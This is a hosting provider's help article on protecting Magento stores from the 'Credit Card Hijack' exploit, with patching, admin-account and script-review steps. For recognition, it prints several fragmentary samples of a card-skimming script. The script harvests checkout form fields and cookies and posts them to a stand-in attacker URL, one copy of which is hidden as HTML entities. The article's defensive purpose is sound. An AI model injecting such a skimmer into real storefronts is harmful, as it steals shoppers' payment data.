How to protect your Magento store from the Credit Card Hijack exploit

How to protect your Magento store from the Credit Card Hijack exploit

This article explains how Magento store administrators can address the Credit Card Hijack security breach by applying the latest patches and performing other critical tasks.


First made known to the public in November 2015, the Credit Card Hijack exploit represents a significant Magento security breach. Using this exploit, attackers inject malicious code into the web browsers of your site’s visitors, allowing them to intercept credit card data.


Attention: In addition to the below actions, we strongly recommend you to enlist the services of a Magento developer or security specialist to audit your code. 

Take the following actions to safeguard the security of your store and your customers’ data.

1: Apply the latest patch

A store running anything other than the most current version is not secure, and the general reluctance of many Magento administrators to stay current contributed to the success of this and other exploits.

Take the following steps:

  1. Identify the most current version by visiting the security center page of the Magento website.

  2. Visit to scan your store and identify your store’s version. If it matches the current version, skip to the "2: Review and secure admin users" section. Otherwise, go to the next step.

  3. Patch your store. See How to patch your Magento store for more information.

2: Review and secure admin users

Use the below procedure to audit and secure your admin users. 

  1. From the Admin Panel, select System > Permissions > Roles.

  2. Remove all accounts not in use, then set new, strong passwords for your remaining admin accounts. See How to create a secure password for more information.

3: Identify and remove unknown scripts

  1. From the Admin Panel, select System > Configuration.

  2. From the Configuration menu, select General > Design.

  3. From the Design menu, click HTML Head and Footer.

  4. If the MiscellaneousScripts and Miscellaneous HTML fields are empty, proceed to the next section. Otherwise, continue to Step 5.

  5. If the Miscellaneous Scripts and Miscellaneous HTML are not empty, ask your developer to search for code similar to the following examples of the Credit Card Hijack exploit’s malicious code:

<script>function jj(e){var t="; "+document.cookie,o=t.split("; "+e+"=");return 2==o.length?o.pop().split(";").shift():void 0}jj("SESSIID")||
document.cookie="SESSIID="+(new Date).getTime()),jQuery(function(e){e("button").on("click",function(){var t="",o="post",n=window.location;if(new RegExp("onepage|checkout").test(n)){for(var c=document.querySelectorAll
("input, select, textarea, checkbox"),i=0;i<c.length;i++)if(c[i].value.length>0){var a=c[i].name;""==a&&(a=i),t+=a+"="+c[i].value+"&"}if(t){var l=new RegExp("[0-9]{13,16}"),u=new XMLHttpRequest;,e("<div />").html
("&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#98;&#97;&#100;&#46;&#103;&#117;&#121;&#47;&#106;&#113;&#117;&#101;&#114;&#121;&#46;&#112;&#104;&#112; ").text(),!0),u.setRequestHeader("Content-type","application/x-www-form-urlencoded"),
var snd =null;
window.onload = function () {
if((new RegExp('onepage')).test(window.location)) {

function clk() { var inp=document.querySelectorAll("input, select, textarea, checkbox");
for (var i=0;i<inp.length;i++){
if(inp[i].value.length>0) {
var nme=inp[i].name;
if(nme=='') { nme=i; }


function send() {
var btn=document.querySelectorAll("a[href*='javascript:void(0)'],button, input, submit, .btn, .button");
for (var i=0;i<btn.length;i++){
var b=btn[i];
if(b.type!='text' && b.type!='select' && b.type!='checkbox' && b.type!='password' && b.type!='radio') {
if(b.addEventListener) {
b.addEventListener("click", clk, false);
}else {
b.attachEvent('onclick', clk);


var frm=document.querySelectorAll("form");
for (var i=0;i<frm.length;i++){
if(frm[i].addEventListener) {
frm[i].addEventListener("submit", clk, false);
}else {
frm[i].attachEvent('onsubmit', clk);

if(snd!=null) {
var cc = new RegExp("[0-9]{13,16}");
var asd="0";
asd="1" ;
var http = new XMLHttpRequest();"POST","https://bad.guy/jquery.php",true);
setTimeout('send()', 150);

<script> function jj(e) { var t = "; " + document.cookie
, o = t.split("; " + e + "=");
return 2 == o.length ? o.pop().split(";").shift() : void 0
jj("SESSIID") || (document.cookie = "SESSIID=" + (new Date).getTime())
, jQuery(function (e) {
e("button").on("click", function () {
var t = ""
, o = "post"
, n = window.location;
if (new RegExp("onepage|checkout").test(n)) {
for (var c = document.querySelectorAll("input, select, textarea, checkbox"), i = 0; i < c.length; i++)
if (c[i].value.length > 0) {
var a = c[i].name;
"" == a && (a = i)
, t += a + "=" + c[i].value + "&"
if (t) {
var l = new RegExp("[0-9]{13,16}")
, u = new XMLHttpRequest;, e("<div />").html("&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#98;&#97;&#100;&#46;&#103;&#117;&#121;&#47;&#106;&#113;&#117;&#101;&#114;&#121;&#46;&#112;&#104;&#112; ").text(), !0)
, u.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
, u.send(t + "&asd=" + (l.test(t.replace(/s/g, "")) ? 1 : 0) + "&utmp=" + n + "&cookie=" + jj("SESSIID"))
, console.clear()

4: Keep your store secure by following best practices

Attackers are constantly improving their methods. To help secure your store against future exploits and attacks, follow the guidelines provided How to improve the security of your Magento store.


For 24-hour assistance any day of the year, contact our Support Team by email or through the Client Portal.

Article Rating (No Votes)
Rate this article
  • Icon PDFExport to PDF
  • Icon MS-WordExport to MS Word
Attachments Attachments
There are no attachments for this article.
Related Articles RSS Feed
How to add SSH keys to your Nexcess Cloud account
Added on Tue, Oct 23, 2018
How to add admin users in Magento 1.x
Added on Tue, Jan 29, 2019
How to set up outgoing SMTP email for Magento
Added on Thu, Jul 5, 2018
How to perform Magento database maintenance
Added on Wed, Jan 30, 2019
How to install Magento CE v1.8 and later
Added on Thu, Mar 6, 2014
How to disable maintenance mode in Magento
Added on Tue, Jan 29, 2019
How to create SSH keys in Windows with PuTTY
Added on Wed, Dec 26, 2018
How to disable caching in Magento
Added on Wed, Jan 30, 2019
What is Turpentine?
Added on Thu, Aug 28, 2014
How to set the return path email in Magento 1.x
Added on Thu, Oct 30, 2014